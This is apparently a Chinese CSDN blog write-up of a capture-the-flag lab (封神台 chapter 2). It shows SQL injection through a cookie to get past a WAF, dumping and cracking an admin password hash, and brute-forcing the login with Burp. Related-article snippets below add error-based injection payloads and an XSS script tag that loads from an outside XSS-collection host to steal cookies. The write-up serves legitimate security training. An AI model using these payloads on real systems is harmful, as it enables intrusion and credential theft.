封神台-第二章 尤里的复仇

最新推荐文章于 2024-05-13 13:59:42 发布
最新推荐文章于 2024-05-13 13:59:42 发布
阅读量2k 收藏 1
点赞数 1
分类专栏: # 封神台 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ploto_cs/article/details/108809704
版权

封神台-第二章 尤里的复仇

1.
在这里插入图片描述任意选择一条新闻动态

2.
在这里插入图片描述

发现出现交互界面 url中id=170 存在注入点
3.判断字段数
?id=170+order+by+10
在这里插入图片描述

?id=170+order+by+11
在这里插入图片描述

4.使用modheader
在这里插入图片描述

直接在url中输入 报错
在这里插入图片描述

第一个字段写cookie 第二个字段 id=170+UNION+SELECT+1,2,3,4,5,6,7,8,9,10+from+admin
5.在url中输入http://59.63.200.79:8004/shownews.asp
在这里插入图片描述

没有报错,并且看到存在admin表,2.3.7.8.9处可以添加查询字段,可以输入username和password
6.重新构造modheader
在这里插入图片描述

2处显示 username admin
3处显示password b9a2a2b5dffb918c

7.password经过md5解密后
在这里插入图片描述

8.登录59.63.200.79:8004/admin
在这里插入图片描述

Username: admin
Password:welcome

突发奇想,虽然不正规 哈哈哈哈
假设已知后台登录登录网址为59.63.200.79:8004/admin
且用户名已知为admin
直接使用bp爆破密码
1.任意输入密码,抓包
在这里插入图片描述

2.发送至intruder
在这里插入图片描述
在这里插入图片描述
标记密码处
Payload处添加自己的密码本
在这里插入图片描述

这里调整线程数为10
在这里插入图片描述

可以显示结果为welcome
3.登录拿key

网络信息安全-ploto

ploto_cs
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
神台尤里复仇Ⅱ 回归)绕过防护getshell
Bu2n的博客
01-05 3512
解题思路 习惯在url后加admin,看是不是管理后台。 一看发现是,就不用目录扫描工具了 填入正确的验证码,抓包输入',查看有无报错 发现报错了,存在报错注入,看报错描述可以知道是字符型注入 查看当前数据库 payload ' or extractvalue(1,concat(0x7e,database()))%23 查看当前库的所有表 payload ' or extractvalue(1,concat(0x7e,(select group_concat(table_name)from info
神台-尤里复仇
weixin_44522540的博客
02-20 767
神台-尤里复仇Ⅰ 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录神台-尤里复仇Ⅰ前言一、为了女神小芳二、1.引入库2.读入数据三、四、为了更多的权限!留言板!五、六、七、八、九、总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的
神台 -尤里复仇Ⅰ write up 夜车星繁的博客
夜车星繁的博客
04-09 2705
无意间知道了这个靶场,可作为复习用,就将它安排进了复习计划里,在此篇博客写下记录留作未来回顾用。因为有了点基础在此写下payload只保证自己可以看得懂。 第一章:为了女神小芳! ?id=1 and 1=1 ------ 显示正常 ?id=1 and 1=2 ------ 不显示 ?id=1 order by 2 ------查询了两列 ?id=100 select 1...
神台 - 掌控安全靶场】尤里复仇 Ⅰ 小芳!一二三四五六七章
热门推荐
algae
08-14 3万+
神台 - 掌控安全靶场】尤里复仇 小芳!第五章:进击!拿到Web最高权限!【配套课时:绕过防护上传木马实战演练】(等级:15) <script src = https://xsspt.com/nxqPZY?1597410463> </ script> cookie : ASPSESSIONIDSQDARATQ=KJFAFKEDEAPPFBEDHJFCIGIC; flag=zkz{xsser-g00d},ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNP
神台靶场-尤里复仇-第一章
weixin_58373549的博客
01-29 271
神台靶场-尤里复仇-第一章:为了女神小芳!【配套课时:SQL注入攻击原理 实战演练】
尤里复仇WIN10全屏切换不黑屏补丁
07-29
尤里复仇WIN10全屏切换不黑屏补丁》是针对经典即时战略游戏《红色警戒2:尤里复仇》在Windows 10操作系统上运行时出现的全屏切换黑屏问题而设计的一款补丁。这款补丁解决了许多玩家在尝试全屏游戏时遭遇的困扰,...
局域网对战玩红警红色警戒--尤里复仇.pdf
11-06
局域网对战玩红警红色警戒--尤里复仇.pdf
examen-final-:尤里为老师
04-27
"尤里为老师"的期末考试可能涵盖了JavaScript的各个方面,包括语法基础、DOM操作、事件处理、AJAX、闭包、原型链以及面向对象编程等关键概念。 首先,JavaScript的基础语法是考试的重点。这涉及到变量声明(var、...
1333199-pognali-22:尤里·莱特
04-06
个人项目“驾驶” 学生: 。 导师: Неизвестно 。 请注意,您的源文件文件夹为source/ 。 有用的文件: 进行更改的指南。 不要删除或注意文件: .editorconfig , .gitattributes , .gitignore , ....
红色警戒尤里复仇魔改
01-16
《红色警戒尤里复仇魔改》是一款基于经典策略游戏《红色警戒2:尤里复仇》进行深度修改的游戏版本,旨在为玩家提供更加丰富、挑战性更强的游戏体验。在这个魔改版本中,开发者运用了高级的算法技术,如极小极大...
尤里复仇II 回归
sparename的博客
09-07 1024
尤里复仇II 回归渗透第一步-信息收集 1渗透第一步-信息收集 2 渗透第一步-信息收集 1 Tips: 信息收集作为渗透测试的第一步,能决定后续测试的走向,甚至能直接找到目标的漏洞,那么如何才能在繁杂的网络世界里找到所需的数据呢? 尤里开始了努力…… 最终他找到了目标的…… 成功掌握了这一技能 基础目录扫描 传送门 题解:非常简单的目录扫描 直接用御剑扫描 不过flag在二级目录里 flag_{oh!you_find_it!} 渗透第一步-信息收集 2 Tips: 经过上次的事件,尤里
神台靶场尤里复仇I第一第二第五第六第七章解题思路(持续更新)
weixin_50549897的博客
01-02 4681
提示:文## 标题章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录一 .第一章二.第二章1.引入库2.读入数据一 .第六章总结 提示: 本文按照靶场题目推进顺序进行,由于作者水平有限,有讲述不当之处敬请批评指出,有更好的解法欢迎在评论区发表。 本文将持续更新。靶场地址https://hack.zkaq.cn/battle 一 .第一章 **sql注入** 首先通过id=2判断是否存在sql注入 ![在这里插入图片描述](https://img-blog.csdnimg.cn/2021
神台--第二章:遇到阻难!绕过WAF过滤!解题思路
04-12 5559
神台--第二章:遇到阻难!绕过WAF过滤!解题思路 一、查找sql注入点 进入测试页面http://59.63.200.79:8004/ 1)字符型、数字型等盲注尝试 随意点开一篇文章,构造单引号',双引号"等闭合查询语句,发现提示如下 网站对请求地址进行了WAF防护,通过测试没有过滤 ==order by、union== 网页防护一般只拦截get、post传参,因此尝试cookie注入 2)cookie注入 cookie注入提交的参数以cookie方式提交,判断步骤 1.找到...
神台第二关
weixin_44106116的博客
11-21 2170
1第一种方法 1 查看是否能够SQL注入 点开第一个新闻,用and 1=1 查看是否存在SQL注入,发现弹出禁用参数对话框 再使用order by ,查看共有几个字段,发现order by 可以用,共十个 因为网页的防护,一般只拦截GET和POST,忽略了cookie也可以传参。所以尝试cookie注入 1.1附加知识点 cookie 类型为“小型文本文件”,是网站给客户端的身份证,由客户端暂时或...
神台 第二章 绕过WAF
m0_65712192的博客
10-14 773
神台 第二章 利用ModHeader绕过WAF
神台靶场---尤里复仇Ⅰ小芳!---第二章遇到阻难!绕过WAF过滤!
qq_44336568的博客
06-28 1475
神台----尤里复仇I-第二章:遇到阻难!绕过WAF过滤!渗透学习、靶场练习
神台 尤里复仇II 回归 信息收集1&&2
shierbai的博客
05-13 218
正常去做信息收集时,看到config文件都是见猎心喜的,这里虽然没直接写flag,但也该多尝试,事实证明,这个尝试是正确的。这里说有sql注入,那么就要找注入点,之前把熊海cms这个指纹识别了,直接去搜索一波。其实在页面源码处也能看到一些可能存在sql注入的点,(这里也是到处点了一波,例如什么。一个可疑的files,一堆php和txt里脱颖而出,对files进行目录扫描。这里被遮住感觉是提示,但说了是基础目录扫描,御剑启动!找到这个,但感觉是后面可能用的,说明是熊海cms。
神台-尤里复仇II 回归sql-注入绕过防护getshell
m0_72592923的博客
01-14 683
神台-尤里复仇II 回归sql-注入绕过防护getshell
神台----尤里复仇I-第二章:遇到阻难!绕过WAF过滤!
正在学习的路上...
07-18 3456
1.找注入点 进去之后,查看新闻,一般在这里有注入点。 输入 ?id=168 and 1=1 过滤了一些关键字,通过测试没有过滤 == order by == 2.猜列数、报显示位 通过测试,发现查询了10列 ?id=171 order by 10 ?id=466454 select 1,2 ------将id设为一个不存在的数,看显示位 3.查看数据库版本和当前数据库名 ?id=1...
UnicodeDecodeError: 'utf-8' codec can't decode byte 0xba in position 13: invalid start byte
最新发布
05-20
这个错误通常出现在Python中,它表示Python解释器在尝试使用UTF-8编码解码一个字符串时出现了错误。具体来说,这个错误通常是由于字符串中包含了无效的字节序列而导致的。 解决这个问题的方法是尝试使用其他编码方式来解码字符串,或者在读取文件时指定正确的编码方式。此外,也可以尝试删除字符串中的无效字节,或者对字符串进行适当的处理。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值